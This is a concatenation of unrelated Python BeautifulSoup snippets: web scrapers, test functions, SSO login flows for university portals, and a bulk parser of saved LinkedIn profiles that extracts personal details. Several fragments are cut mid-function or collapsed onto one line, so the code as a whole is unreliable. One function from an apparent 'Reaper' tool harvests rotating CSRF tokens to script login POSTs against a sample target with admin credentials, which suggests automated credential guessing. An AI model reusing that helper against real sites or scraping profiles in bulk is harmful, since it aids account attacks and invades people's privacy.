def Login(self, username=None, password=None):
    if self.username:
        username = self.username
    if self.password:
        password = self.password
    # Request username if needed
    if username is None or len(username) < 3:
        username = str(input("username: "))
    # Request password if needed (reconstructed: this prompt was redacted in the source)
    if password is None:
        password = str(input("password: "))
    if len(password) > 127:
        raise BaseException("Password too long, must be less than 128 characters.")
    credentials = {
        "UserName": username,
        "Password": password,
        "AuthMethod": "FormsAuthentication"
    }
    # Get the URL with the CSRF token
    self.prepare()
    # Make the login request
    ADFSResponse = self.s.post(
        self.adfs,
        data=credentials,
        headers={
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
        },
        allow_redirects=True)
    soup = Soup(ADFSResponse.text, "html.parser")
    # Check if an error occurred
    error = soup.find("span", {"id": "errorText"})
    if error:
        error = error.text
    if error:
        raise BaseException(str(error))
    print("[+] Authenticated with domain controller SSO!")
    # Fetch redirect location for Active Directory SAML authentication
    ADController = soup.find("form", {"name": "hiddenform"})
    if not ADController:
        raise BaseException(
            "An unknown error occurred while authenticating with the controller.")
    ADController = ADController['action']
    if not ADController:
        raise BaseException(
            "An unknown error occurred while authenticating with the controller: No engine in response.")
    # Fetch SAML session
    SAMLResponse = soup.find("input", {"name": "SAMLResponse"})
    if not SAMLResponse:
        raise BaseException(
            "An unknown error occurred while authenticating with the controller: No SAML in response.")
    SAMLResponse = SAMLResponse['value']
    if not SAMLResponse:
        raise BaseException(
            "An unknown error occurred while authenticating with the controller: No SAML in response.")
    SAMLSession = {"SAMLResponse": SAMLResponse}
    # Finally log in at the domain controller
    ADCTLResponse = self.s.post(ADController, data=SAMLSession, allow_redirects=True)
    # Check if authentication succeeded
    if ADCTLResponse.status_code != 200:
        raise BaseException("Authentication failure: " +
                            responses[ADCTLResponse.status_code])
    print("[+] Got SAML session, can now authenticate with application.")
    # Continue to the Brightspace controller
    soup = Soup(ADCTLResponse.text, "html.parser")
    # Get the process form
    DLOController = soup.find("form", {"id": "ProcessForm"})
    if not DLOController:
        raise BaseException("Failed to retrieve DLO controller")
    # Retrieve the Brightspace controller
    DLOController = DLOController['action']
    if not DLOController:
        raise BaseException("Failed to retrieve DLO controller")
    # Fetch SAML session
    SAMLResponse = soup.find("input", {"name": "SAMLResponse"})
    if not SAMLResponse:
        raise BaseException(
            "An unknown error occurred while authenticating with the controller: No SAML in response.")
    SAMLResponse = SAMLResponse['value']
    if not SAMLResponse:
        raise BaseException(
            "An unknown error occurred while authenticating with the controller: No SAML in response.")
    SAMLSession = {"SAMLResponse": SAMLResponse}
    # Authenticate with Brightspace
    DLOCTLResponse = self.s.post(DLOController, data=SAMLSession, allow_redirects=True)
    if DLOCTLResponse.status_code != 200:
        print("Failed to login at Brightspace, reason: %s" %
              responses[DLOCTLResponse.status_code])
    print("Welcome to the Digital Learning Environment of HVA")
    print("-" * 25)
def test_definition_sql(path, expected_definition_sql, app_client):
    response = app_client.get(path)
    pre = Soup(response.body, "html.parser").select_one("pre.wrapped-sql")
    assert expected_definition_sql == pre.string
def test_facet_display(app_client):
    response = app_client.get(
        "/fixtures/facetable?_facet=planet_int&_facet=city_id&_facet=on_earth")
    assert response.status == 200
    soup = Soup(response.body, "html.parser")
    divs = soup.find("div", {"class": "facet-results"}).findAll("div")
    actual = []
    for div in divs:
        actual.append({
            "name": div.find("strong").text,
            "items": [{
                "name": a.text,
                "qs": a["href"].split("?")[-1],
                "count": int(str(a.parent).split("</a>")[1].split("<")[0]),
            } for a in div.find("ul").findAll("a")],
        })
    assert [
        {
            "name": "city_id",
            "items": [
                {"name": "San Francisco", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=1", "count": 6},
                {"name": "Los Angeles", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=2", "count": 4},
                {"name": "Detroit", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=3", "count": 4},
                {"name": "Memnonia", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&city_id=4", "count": 1},
            ],
        },
        {
            "name": "planet_int",
            "items": [
                {"name": "1", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&planet_int=1", "count": 14},
                {"name": "2", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&planet_int=2", "count": 1},
            ],
        },
        {
            "name": "on_earth",
            "items": [
                {"name": "1", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&on_earth=1", "count": 14},
                {"name": "0", "qs": "_facet=planet_int&_facet=city_id&_facet=on_earth&on_earth=0", "count": 1},
            ],
        },
    ] == actual
import scraperwiki
import urllib2
import re
from bs4 import BeautifulSoup as Soup

url = "http://nl.wikipedia.org/wiki/Lijst_van_huidige_burgemeesters_in_Nederland"
#for num in range(0, 10):
#    baseplusnr = base_url + str(num)
#    url = baseplusnr
#    #print url
# Fetch the page first: passing the bare URL string to Soup would parse the URL
# text itself rather than the page it points at.
soup = Soup(urllib2.urlopen(url))
hl = soup.findAll("tr")
#hlclean = hl.href.string
print hl
def test_metadata_json_html(app_client):
    response = app_client.get("/-/metadata")
    assert response.status == 200
    pre = Soup(response.body, "html.parser").find("pre")
    assert METADATA == json.loads(pre.text)
def query_13f(self):
    # Narrow the query parameters to the '13F-HR' filing type and return the parsed results
    query_13f = self.query + "&type=13F-HR&dateb=&owner=include&count=40"
    query_13f_resp = requests.get(query_13f)
    query_13f_soup = Soup(query_13f_resp.text, "html.parser")
    return query_13f_soup
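    # A minimal usage sketch (hypothetical: assumes this method lives on a class
    # whose `self.query` holds an SEC EDGAR browse-company URL; the CIK and the
    # "documentsbutton" link id are illustrative, not confirmed by this source):
    #
    #   scraper.query = ("https://www.sec.gov/cgi-bin/browse-edgar"
    #                    "?action=getcompany&CIK=0001067983")
    #   soup = scraper.query_13f()
    #   for link in soup.findAll("a", {"id": "documentsbutton"}):
    #       print(link["href"])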
driver = webdriver.Chrome(chrome_path)

def go_to_about(sup_url):
    # Load the page with Selenium and parse the rendered HTML; driver.get()
    # takes the URL and returns None, so the page source must be read from
    # driver.page_source rather than a file-like object.
    driver.get(sup_url)
    about_html = driver.page_source
    about_soup = Soup(about_html, "html.parser")
    nav = about_soup.nav
    for url in nav.findAll("a"):
        #count = count + 1
        sub_url = url.get('href')
        tot_url = parse.urljoin(sup_url, sub_url)
        print(tot_url)

my_url = 'https://dir.indiamart.com/impcat/peanutbutter-all.html'
uClient = uReq(my_url)
page_html = uClient.read()
uClient.close()
page_soup = Soup(page_html, "html.parser")
containers = page_soup.findAll("div", {"class": "prr w100"})
for container in containers:
    main_link = container.a["href"]
    #mainn = Soup(main_link, "html.parser")
    go_to_about(main_link)
    #break
#print(len(containers))
#print(main_link)
def parametersfunc(threadName, p, url, save, second_way, page):
    # set some variables
    parameters = {}
    # make the parameters a list
    parameters_list = p.split("/")
    # make the parameters list a dictionary (needed by the requests module)
    for i in range(0, len(parameters_list)):
        para = parameters_list[i].split("=")
        parameters[para[0]] = para[1]
    # make a GET request to obtain the cookies and the csrf token
    req = requests.get(url)
    # extract the cookies
    cookie = req.cookies
    # extract the csrf token and add it to parameters
    # if the csrf token is embedded in the HTML:
    for key, value in parameters.items():
        if value == "TOKEN":
            html = req.text
            soup = Soup(html, 'lxml')
            try:
                csrf_token = soup.find_all(attrs={"name": key})[0].get('value')
            except IndexError:
                return
            else:
                # replace TOKEN with the csrf_token
                parameters[key] = csrf_token
    # if the csrf token is in a script:
    for key, value in parameters.items():
        if value == "SCRIPT":
            html = req.text
            csrf_token = ""
            try:
                # search the html text for the csrf_token
                re.search(key + r".*?value.*?=.*?\w.*?;", html)
            except IndexError:
                return
            else:
                # find all occurrences of the csrf_token in the html text (there might
                # be more than one if the site has included extras as comments)
                csrf_token1 = re.findall(key + r".*?value.*?=.*?\w.*?;", html)
                # if there are comments to fool Reaper
                if len(csrf_token1) > 1:
                    # make a second get request
                    req = requests.get(url)
                    # extract the cookies again because they change with each request
                    cookie = req.cookies
                    html = req.text
                    # find all occurrences of the csrf_token in the html text again
                    csrf_token2 = re.findall(key + r".*?value.*?=.*?\w.*?;", html)
                    # cross-check the results and drop entries identical in both
                    # responses (a static string cannot be the rotating token);
                    # a comprehension avoids mutating the list while iterating over it
                    csrf_token1 = [i for i in csrf_token1 if i not in csrf_token2]
                # token should be a list with 2 items (the csrf_token is in the 2nd item)
                token = str(csrf_token1).split("=")
                try:
                    token[1]
                except IndexError:
                    return
                else:
                    # keep only the alphanumeric characters of the token
                    for i in token[1]:
                        if i.isalnum():
                            csrf_token += i
                    # replace TOKEN with the csrf_token
                    parameters[key] = csrf_token
    request(url, cookie, parameters, page, second_way, save)
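# A minimal usage sketch (all values hypothetical; `request` and the thread
# plumbing are defined elsewhere). The `p` string packs the POST parameters as
# key=value pairs joined by "/", with the literal value TOKEN (or SCRIPT)
# marking where the scraped CSRF token is substituted:
#
#   parametersfunc("Thread-1",
#                  "username=admin/password=secret/csrf=TOKEN",
#                  "http://target.example/login.php",
#                  save=True, second_way=False, page="login.php")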
import os
from pymongo import MongoClient
from bs4 import BeautifulSoup as Soup
from utilities import is_number
from utilities import download_master_file
from utilities import save_error_file
# create_dir and read_master_file are assumed to come from utilities as well
from utilities import create_dir, read_master_file

conn = MongoClient()
collection = conn["labbioinfo"]["IBD"]
folders = create_dir('PRJNA389280.txt', 'IBD')
download_master_file('https://ibdmdb.org/tunnel/products/HMP2/Metadata/hmp2_metadata.csv', folders[4])
metadata_set = read_master_file(folders[4], ',')
for filename in os.listdir(folders[3]):
    fullname = os.path.join(folders[3], filename)
    infile = open(fullname, "r")
    contents = infile.read()
    soup = Soup(contents, 'xml')
    sample_ID = soup.find('SUBMITTER_ID')
    if sample_ID is not None:
        sampleid = sample_ID.get_text()
        sample_set = metadata_set.loc[metadata_set['Project'] == sampleid]
        sample_set = sample_set.to_dict('index')
        key_loc = list(sample_set.keys())
        sampledict = sample_set[key_loc[0]]
        primary_ID = soup.find('PRIMARY_ID')
        taxon_ID = soup.find('TAXON_ID')
        science_name = soup.find('SCIENTIFIC_NAME')
        tags = soup.findAll('TAG')
        values = soup.findAll('VALUE')
        infile.close()
        tags = [i.get_text() for i in tags]
        loc1 = tags.index("geo_loc_name")
def parsePage(self):
    self.Soup = Soup(self.page_html, "html.parser")
def test_add_state_route_get_has_select_list(self, get_data):
    """."""
    response = self.client.get(reverse_lazy("add_state"))
    html = Soup(response.content, "html5lib")
    self.assertEqual(len(html.find_all("option")), len(STATES) - 1)
def foo(ID, URL):
    try:
        opener = urllib2.build_opener()
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        url = URL
        response = opener.open(url)
        page = response.read()
        #from bs4 import BeautifulSoup
        soup = Soup(page)
        #print soup
        #Head = soup.find('head')
        """Id = (Head.find('link'))  #.encode('utf8', 'ignore').strip()
        id = (Id.get('href')).strip().split('/')[4]
        id = str(id)"""
        id = ID
        #print id
        Data = soup.findAll('td', {'class': 'fdata'})
        name = Data[0].text
        #print name
        Website_link = Data[1].find('a')
        website_link = (Website_link.get('href')).strip()
        #print website_link
        category = Data[2].text
        #print category
        active = Data[3].text
        #print active
        founders = Data[4].text
        #print founders
        current_director = Data[5].text
        #print current_director
        try:
            Board_of_directors_link = Data[6].find('a')
            board_of_directors_link = (Board_of_directors_link.get('href')).encode('utf8', 'ignore').strip()
            #print board_of_directors_link
        except Exception, e:
            print "Board of directors error: " + str(e)
        politicalaffiliation = Data[7].text
        #print politicalaffiliation
        research = Data[8].text
        #print research
        mission = Data[9].text
        #print mission
        non_profit = Data[10].text
        #print non_profit
        funding = Data[11].text
        #print funding
        address = Data[25].text
        #print address
        phonenumber = Data[27].text
        #print phonenumber
        posturl = soup.find('div', {'class': 'content'})
        post_url = posturl.find('form')
        pourl = (post_url.get('action')).strip()
# Constant for setting wallpaper by day of month
DAY_OF_MONTH = date.today().day
# Constant for creating and storing images
STORE_DIRECTORY = os.path.join(
    os.path.expanduser('~'),
    'Pictures/Wallpapers/Hubble Space Advent Calendar 2018')
# Constant for matching filepaths/filenames on CDN
VALID_IMAGE = re.compile(r'.*/a\d{1,2}.*')
# Make the required directories
os.makedirs(STORE_DIRECTORY, exist_ok=True)
# Fetch the page for parsing
page = Soup(urllib.request.urlopen(CALENDAR_URL), 'html.parser')
# Find the containers
images = page.findAll('li', id=re.compile(r'img(\d{1,2})'))
# Create an empty dictionary to store the valid image URLs
valid_images = {}
# Find the valid image URLs
for image in images:
    image_url = image.find('source', attrs={
        'data-srcset': re.compile('main_1500')
    }).get('data-srcset')
    if VALID_IMAGE.match(image_url):
        valid_images[len(valid_images) + 1] = image_url
def parse_html(page_html):
    """HTML parsing."""
    return Soup(page_html, "html.parser")
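# A minimal usage sketch (assumes the requests library is available;
# the URL is illustrative):
#
#   import requests
#   html = requests.get("https://example.com").text
#   soup = parse_html(html)
#   print(soup.title)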
from bs4 import BeautifulSoup as Soup
import requests
import re

page = requests.get(
    'https://www.goodreads.com/book/show/23165017-separate-and-dominate?from_search=true',
    headers={'User-Agent': 'test'})
page = page.text
soup = Soup(page, 'html.parser')
#soup = soup.prettify()
soup = soup.find_all('span')
#print(soup)
for i in soup:
    print(i)
    # Note: this passes the builtin `id` function to find() as a callable tag
    # filter, which matches any child tag (id(tag) is always truthy); the
    # commented-out block below suggests spans with an id attribute were intended.
    if i.find(id):
        print(i.get_text())
        print('--------------------------------------------\n')
#print(text)
'''
x = i.get('id')
if x == None:
    continue
#print(x)
text = i.find(id)
print(text)
#print(text.get_text())
'''
def get_news(self, deamplify=False):
    self.url = 'https://news.google.com/'
    try:
        self.req = urllib.request.Request(self.url, headers=self.headers)
        self.response = urllib.request.urlopen(self.req)
        self.page = self.response.read()
        self.content = Soup(self.page, "html.parser")
        self.content = self.content.find("h2").parent.parent.parent
        result = self.content.findChildren("div", recursive=False)
        section = None
        for item in result:
            try:
                try:
                    section = item.find("h2").find("a").text
                except Exception as sec_e:
                    pass
                title = item.find("h3").text
                if deamplify:
                    try:
                        link = item.find("article").get("jslog").split('2:')[1].split(';')[0]
                    except Exception as deamp_e:
                        print(deamp_e)
                        link = 'news.google.com/' + item.find("h3").find("a").get("href")
                else:
                    link = item.find("h3").find("a").get("href")
                self.texts.append(title)
                self.links.append(link)
                try:
                    datetime = item.find("time").get("datetime")
                except:
                    datetime = None
                try:
                    time = item.find("time").text
                except:
                    time = None
                try:
                    site = item.find("time").parent.find("a").text
                except:
                    site = None
                try:
                    img = item.find("img").get("src")
                except:
                    img = None
                desc = None
                if link.startswith('https://www.youtube.com/watch?v='):
                    desc = 'video'
                self.results.append({
                    'section': section,
                    'title': title,
                    'datetime': datetime,
                    'time': time,
                    'site': site,
                    'desc': desc,
                    'link': link,
                    'media': None,
                    'img': img
                })
            except Exception as big_e:
                pass
        self.response.close()
    except Exception as e:
        print(e)
        pass
def fetch_query(self, query):
    resp = requests.get(query)
    soup = Soup(resp.text, "html.parser")
    return soup
import sys
import urllib
from bs4 import BeautifulSoup as Soup

BRAND = "nexus"

if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit("Usage: %s <html-file> <download-path>" % sys.argv[0])
    fn = sys.argv[1]
    dn = sys.argv[2]
    with open(fn, "r") as f:
        soup = Soup(f, "html.parser")
    divs = soup.findAll("div", {"class": "devsite-table-wrapper"})
    for div in divs:
        trs = div.find("tbody").findAll("tr")
        for tr in trs:
            td = tr.findAll("td")[0]
            vern = td.text.split(" ")[0]
            a = tr.find("a")
            link = a["href"]
            tokens = link.split("/")[-1].split("-")
            model = tokens[0]
            build = tokens[1]
            name = "%s-%s-%s-%s" % (BRAND, model, build, vern)
])

# ----------- copy images over:
print(destImagesPath)
if os.path.exists(sourceImagesPath):
    copytree(sourceImagesPath, destImagesPath)

chapterDict = {}
chapterDict['path'] = chapter
chapterDict['href'] = chapter + ".html"

# ----------- now let's alter the HTML that's produced:
if os.path.exists(destChapterPath):
    soup = Soup(open(destChapterPath, "rb").read(), "html.parser")

    # --- grab the title from h1
    h1s = soup.find_all("h1")
    if (len(h1s) > 0):
        chapterDict['title'] = h1s[0].getText()
    else:
        chapterDict['title'] = "needs h1"
    chapterDict['chapterListName'] = chapter
    chapterDict['sections'] = []
    chapterDict['destChapterPath'] = destChapterPath

    # --- Grab all the h2 (we call them sections)
    h2s = soup.find_all("h2")
def get_news(self, key="",deamplify=False): if key != '': key = "+".join(key.split(" ")) self.url = 'https://news.google.com/search?q={}+when:{}&hl={}'.format(key,self.__period,self.__lang.lower()) else: self.url = 'https://news.google.com/?hl={}'.format(self.__lang) try: self.req = urllib.request.Request(self.url, headers=self.headers) self.response = urllib.request.urlopen(self.req) self.page = self.response.read() self.content = Soup(self.page, "html.parser") articles = self.content.select('div[class="NiLAwe y6IFtc R7GTQ keNKEd j7vNaf nID9nc"]') for article in articles: try: # title try: title=article.find('h3').text except: title=None # description try: desc=article.find('span').text except: desc=None # date try: date = article.find("time").text # date,datetime_tmp = lexial_date_parser(date) except: date = None # datetime try: datetime_chars=article.find('time').get('datetime') datetime_obj = parse(datetime_chars).replace(tzinfo=None) except: datetime_obj=None # link if deamplify: try: link = 'news.google.com/' + article.find("h3").find("a").get("href") except Exception as deamp_e: print(deamp_e) link = article.find("article").get("jslog").split('2:')[1].split(';')[0] else: link = 'news.google.com/' + article.find("h3").find("a").get("href") self.__texts.append(title) self.__links.append(link) if link.startswith('https://www.youtube.com/watch?v='): desc = 'video' # image try: img = article.find("img").get("src") except: img = None # site try: site=article.find("time").parent.find("a").text except: site=None # collection self.__results.append({'title':title, 'desc':desc, 'date':date, 'datetime':datetime_obj, 'link':link, 'img':img, 'media':None, 'site':site}) except Exception as e_article: print(e_article) self.response.close() except Exception as e_parser: print(e_parser) pass
def read_static(params):
    from bs4 import BeautifulSoup as Soup
    from time import time
    import MySQLdb
    import requests
    import json
    import re
    import os
    #import excelHelper
    import dbHandler  # used below for addsgendata
    import time
    #import CreateCSV
    import multiprocessing
    from multiprocessing import Pool
    import random
    import urllib
    import csv
    import traceback
    from selenium import webdriver
    import glob

    #7137737
    #list_of_files = glob.glob("C:\\Users\\Acer\\Desktop\\code\\linkedin code\\2.Crawler\\Dump\\10000-153324087.html")
    list_of_files = glob.glob(
        "C:\\Users\\Acer\\Desktop\\code\\linkedin code\\2.Crawler\\dump\\dump2\\*.html"
    )
    #C:\Users\Acer\Desktop\code\linkedinproject\crawler\next1000
    ##print list_of_files
    process_name = params[2]
    start_index = params[0]
    end_index = params[1]
    effective_list = list_of_files[int(start_index):int(end_index)]
    file_counter = 0
    for files in effective_list:
        try:
            file_counter += 1
            ##print 'Process No.:' + process_name + ' -parsing file no:' + str(file_counter) + ":"
            #file_r = open("103-174319117.html").read()
            #soup = Soup(file_r, 'html.parser')
            filename = open(files, 'rb')
            #print "filename ", filename
            #linkedin_id = ''.join(files.split('y\\')[5].split('.')[:-1])
            employer_of = "n/a"
            f = files
            #lid = f[f.find('y\\') + 2:f.find('.html')]
            ccid = f[f.find('ump2\\') + 5:f.find('-')]
            lid = f[f.find('-') + 1:f.find('.html')]
            #lid = f[:f.find('.html')]
            print ccid, "-", lid
            html_content = filename.read()
            filename.close()
            soup = Soup(html_content, 'html.parser')
            #print "soup done"
            current_position_date = "N/A"

            # General Details
            try:
                print "General"
                #main_div = soup.find("div", {"id": "body"}).find("div", {"id": "profile"})
                #top_card = main_div.find("span", {"class": "full-name"})
                gen_det = []
                gen_det.append(ccid)
                gen_det.append(lid)
                try:
                    employee_name = soup.findAll(
                        'span', {'class': 'full-name'})[0].text.encode('utf-8', 'replace')
                    print employee_name
                except Exception, e:
                    print traceback.format_exc()
                    employee_name = 'NA'
                    #continue
                print employee_name
                gen_det.append(employee_name)
                try:
                    current_title = soup.find("div", {"id": "headline"}).find(
                        "p", {"class": "title"}).text.encode('utf-8', 'replace')
                    try:
                        current_position = current_title.split(' at ')[0].encode('utf-8', 'replace')
                    except:
                        current_position = 'NA'
                    try:
                        current_company = current_title.split(' at ')[1].encode('utf-8', 'replace')
                    except:
                        current_company = 'NA'
                except:
                    current_title = "NA"
                #print "title", current_title
                gen_det.append(current_title)

                # Location Details
                all_loc_div = soup.findAll('div', {'id': 'demographics'})
                #print 'Location', len(all_loc_div)
                i = 0
                for div in all_loc_div:
                    i += 1
                    loc = []
                    final_div = div
                    try:
                        loc_div = final_div.findAll('span', {'class': 'locality'})
                        loc_name = loc_div[0].findAll('a')
                        if len(loc_name) > 1:
                            loc_name1 = loc_name[0].text
                            loc_name2 = loc_name[1].text
                            location_name = loc_name1 + " ," + loc_name2
                        else:
                            loc_name1 = loc_name[0].text
                            location_name = loc_name1
                        #field_name2 = field_div[1].find('a').text.encode('utf-8', 'replace')
                    except Exception, e:
                        #print str(e)
                        location_name = "N/A"
                    ##print "Location ", location_name
                    loc.append(location_name)
                    try:
                        ind_div = final_div.findAll('dd', {'class': 'industry'})
                        ind = []
                        ind_name = ind_div[0].findAll('a')
                        if len(ind_name) > 1:
                            ind_name1 = ind_name[0].text
                            # fixed: was assigned to loc_name2, leaving ind_name2 undefined
                            ind_name2 = ind_name[1].text
                            industry_name = ind_name1 + " ," + ind_name2
                        else:
                            ind_name1 = ind_name[0].text
                            industry_name = ind_name1
                    except Exception, e:
                        #print str(e)
                        industry_name = "N/A"
                    #print "Industry ", industry_name
                    ind.append(industry_name)
                    gen_det.append(location_name)
                    gen_det.append(industry_name)
                #print gen_det

                # current / previous / education summary
                curr_div = soup.find('tr', {'id': re.compile('overview-summary-current')})
                curr = []
                if curr_div is not None:
                    stri_c = ""
                    final_div = curr_div.findAll('a')
                    for k in final_div:
                        try:
                            c = k.text
                        except:
                            c = "NA"  # fixed: was a bare NA name
                        p = c.find('Edit ')
                        if p != -1:
                            pass
                        else:
                            curr.append(c)
                else:
                    stri_c = ""
                    curr.append("NA")
                    curr.append("NA")
                for i in range(1, len(curr)):
                    if i == len(curr) - 1:
                        stri_c += curr[i]
                    else:
                        stri_c += curr[i] + ","
                gen_det.append(stri_c)

                prev_div = soup.find('tr', {'id': re.compile('overview-summary-past')})
                prev = []
                if prev_div is not None:
                    stri_p = ""
                    final_div = prev_div.findAll('a')
                    for k in final_div:
                        try:
                            c = k.text
                        except:
                            c = "NA"
                        p = c.find('Edit ')
                        if p != -1:
                            pass
                        else:
                            prev.append(c)
                else:
                    stri_p = ""
                    prev.append("NA")
                    prev.append("NA")
                #print prev
                for i in range(1, len(prev)):
                    if i == len(prev) - 1:
                        stri_p += prev[i]
                    else:
                        stri_p += prev[i] + ","
                gen_det.append(stri_p)

                educa_div = soup.find('tr', {'id': re.compile('overview-summary-education')})
                educa = []
                if educa_div is not None:
                    stri_e = ""
                    final_div = educa_div.findAll('a')
                    for k in final_div:
                        try:
                            c = k.text
                        except:
                            c = "NA"
                        p = c.find('Edit ')
                        if p != -1:
                            pass
                        else:
                            educa.append(c)
                else:
                    stri_e = ""
                    educa.append("NA")
                    educa.append("NA")
                for i in range(1, len(educa)):
                    if i == len(educa) - 1:
                        stri_e += educa[i]
                    else:
                        stri_e += educa[i] + ","
                #educ = stri.encode('utf-8', 'replace')
                gen_det.append(stri_e)
                print gen_det
                dbHandler.addsgendata(gen_det)

                # Experience Details
                all_exp_div = soup.findAll('div', {'id': re.compile('experience-.*-view')})
                #print 'experience', len(all_exp_div)
                i = 0
                for div in all_exp_div:
                    i += 1
                    pos = []
                    pos.append(ccid)
                    pos.append(lid)
                    final_div = div
                    try:
                        title = final_div.find('h4').text.encode('utf-8', 'replace')
                    except:
                        title = "N/A"
                    #print "title ", title
                    pos.append(title)
                    try:
                        company_div = final_div.find('header').find_all('h5')
                        if len(company_div) > 1:
                            company_name = company_div[1].find('a').text.encode('utf-8', 'replace')
                        else:
                            company_name = company_div[0].find('a').text.encode('utf-8', 'replace')
                    except Exception, e:
                        #print str(e)
                        company_name = "N/A"
                    #print "company_name ", company_name
                    pos.append(company_name)
                    try:
                        date_s = final_div.find('span', {'class': 'experience-date-locale'})
                        try:
                            loc = date_s.find('span', {'class': 'locality'}).text.encode('utf-8', 'replace')
                        except:
                            loc = "NA"
                        try:
                            date_span = date_s.text.encode('utf-8', 'replace')
                            ds = date_span.decode('utf-8').split(u'\u2013')
                            end = ds[1].replace(loc, "")
                        except:
                            ds = ["N/A"]
                            end = "NA"
                    except:
                        loc = "NA"
                        ds = ["N/A"]
                        end = "NA"
                    #print "date_span ", ds
                    pos.append(ds[0])
                    pos.append(end)
                    pos.append(loc)
dir = str(sys.argv[1])
enc = str(sys.argv[2])
mapping = defaultdict(str)
os.system("cat dict.txt | grep i | grep _ | sed -n '/ /s/ */ /gp' > var.txt")
os.system("sed 's/^[ \t]*//' var.txt > sol.txt")
f = open("sol.txt", "r")
for l in f:
    l = l.strip().split(' ')
    mapping[l[0]] = l[1]
f.close()
handle = open(dir + '/res' + enc + '.xml').read()
soup = Soup(handle, 'xml')

def hasNumbers(inputString):
    return any(char.isdigit() for char in inputString)

variables = defaultdict(int)
for var in soup.findAll('variable'):
    var_name = var["name"]
    var_value = round(float(var["value"]))
    variables[var_name] = var_value
os.system(
    "cat tree.lst | grep 'VAR ' | grep -v objvar | cut -d ' ' -f 3- | sed -n '/ /s/ */ /gp' | cut -d ' ' -f 1,3 > solution.txt"
)
def test_canned_query_default_title(app_client):
    response = app_client.get("/fixtures/magic_parameters")
    assert response.status == 200
    soup = Soup(response.body, "html.parser")
    assert "fixtures: magic_parameters" == soup.find("h1").text
import urllib
import urllib2, sys
from bs4 import BeautifulSoup as Soup
import re

# Approach: open a page, fetch its contents, specify which data you want,
# store it, then move on to the next page.

# Assemble the URL from 3 parts: a fixed base_url, an incrementing id,
# and a fixed suffix.
base_url = "http://evenementen.uitslagen.nl/2013/marathonrotterdam/details.php?s="
end_url = "&o=1&t=nl"
for num in range(1, 3):
    html = base_url + str(num)
    url = html + end_url  # this joins the three URL parts together
    soup = Soup(urllib.urlopen(url))  # open the page

    # The block below is from ammar: raw data/tags lumped into a single field
    #for url in urls:
    #    print "Scraping", url
    #    page = scraperwiki.scrape(url)
    #    if page is not None:
    #        naam = re.findall("Naam(.*?)</table>", page, re.DOTALL)
    #        data = {'Naam': naam}
    #        scraperwiki.sqlite.save(['Naam'], data)

    # All individual cells in separate fields, but the table appears three times
    #table = soup.find("table")
    #for row in table.findAll("tr"):
    #    for cell in row.findAll("td"):
    #        print cell.findAll(text=True)
def test_zero_results(app_client, path):
    response = app_client.get(path)
    soup = Soup(response.text, "html.parser")
    assert 0 == len(soup.select("table"))
    assert 1 == len(soup.select("p.zero-results"))
def phase(config, session=False):
    url = "https://www.lectio.dk/lectio/%s/studieplan/forloeb_vis.aspx?phaseid=%s" % (
        str(config["school_id"]), str(config["phase_id"]))
    if session is False:
        session = authenticate.authenticate(config)
    if session == False:
        return {"status": "error", "type": "authenticate"}
    cookies = {
        "lecmobile": "0",
        "ASP.NET_SessionId": session["ASP.NET_SessionId"],
        "LastLoginUserName": session["LastLoginUserName"],
        "lectiogsc": session["lectiogsc"],
        "LectioTicket": session["LectioTicket"]
    }
    # Insert User-agent headers and the cookie information
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1665.2 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
        "Host": "www.lectio.dk",
        "Origin": "https://www.lectio.dk",
        "Cookie": functions.implode(cookies, "{{index}}={{value}}", "; ")
    }
    response = proxy.session.get(url, headers=headers)
    html = response.text
    soup = Soup(html)
    if soup.find("div", attrs={"id": "m_Content_islandViewForløb_pa"}) is None:
        return {"status": False, "error": "Data not found"}
    headers = []
    elements = []
    for row in soup.find("div", attrs={
            "id": "m_Content_islandViewForløb_pa"
    }).find("table").findAll("tr", recursive=False):
        headers.append(row.find("th", recursive=False))
        elements.append(row.find("td", recursive=False))
    rows = functions.mapRows(headers, elements)
    changeProg = re.compile(
        r"(?P<date>.*) af (?P<teacher>.*) \((?P<abbrevation>.*)\)")
    teamProg = re.compile(ur"(?P<term>.*): (?P<team>.*)")
    teams = []
    periods = []
    focusPoints = []
    workMethods = []
    activities = []
    assignments = []
    periodeProg = re.compile(r"(?P<start>.*) - (?P<end>.*)")
    activityProg = re.compile(
        r"\/lectio\/(?P<school_id>.*)\/aktivitet\/aktivitetinfo.aspx\?id=(?P<activity_id>.*)&prevurl=(?P<prev_url>.*)"
    )
    if not rows["Aktiviteter"].find(attrs={"id": "m_Content_ActivitiesGV"}) is None:
        for row in rows["Aktiviteter"].find(attrs={
                "id": "m_Content_ActivitiesGV"
        }).findAll("tr")[1:]:
            elements = row.findAll("td")
            activityGroups = activityProg.match(elements[1].find("a")["href"])
            activities.append({
                "activity_id": activityGroups.group("activity_id") if not activityGroups is None else ""
            })
    if not rows["Skriftligtarbejde"].find(attrs={"id": "m_Content_ExercisesGrid"}) is None:
        for row in rows["Skriftligtarbejde"].find(attrs={
                "id": "m_Content_ExercisesGrid"
        }).findAll("tr")[1:]:
            elements = row.findAll("td")
            assignments.append({
                "name": unicode(elements[0].text),
                "date": datetime.strptime(elements[1].text.strip(), "%d-%m-%Y")
            })
    for row in rows["Periode(r)"].text.strip().replace("\r\n", "").split("\n"):
        periodeGroups = periodeProg.match(row)
        periods.append({
            "start": datetime.strptime(periodeGroups.group("start").strip(), "%d-%m-%Y") if not periodeGroups is None else "",
            "end": datetime.strptime(periodeGroups.group("end").strip(), "%d-%m-%Y") if not periodeGroups is None else ""
        })
    for row in rows["Arbejdsformer"].findAll("span"):
        workMethods.append({"text": unicode(functions.cleanText(row.text))})
    termProg = re.compile(r"(?P<value>.*)\/(?P<end>.*)")
    for row in rows["Hold"].findAll("span"):
        teamGroups = teamProg.match(row.text)
        termGroups = termProg.match(teamGroups.group("term") if not teamGroups is None else "")
        teams.append({
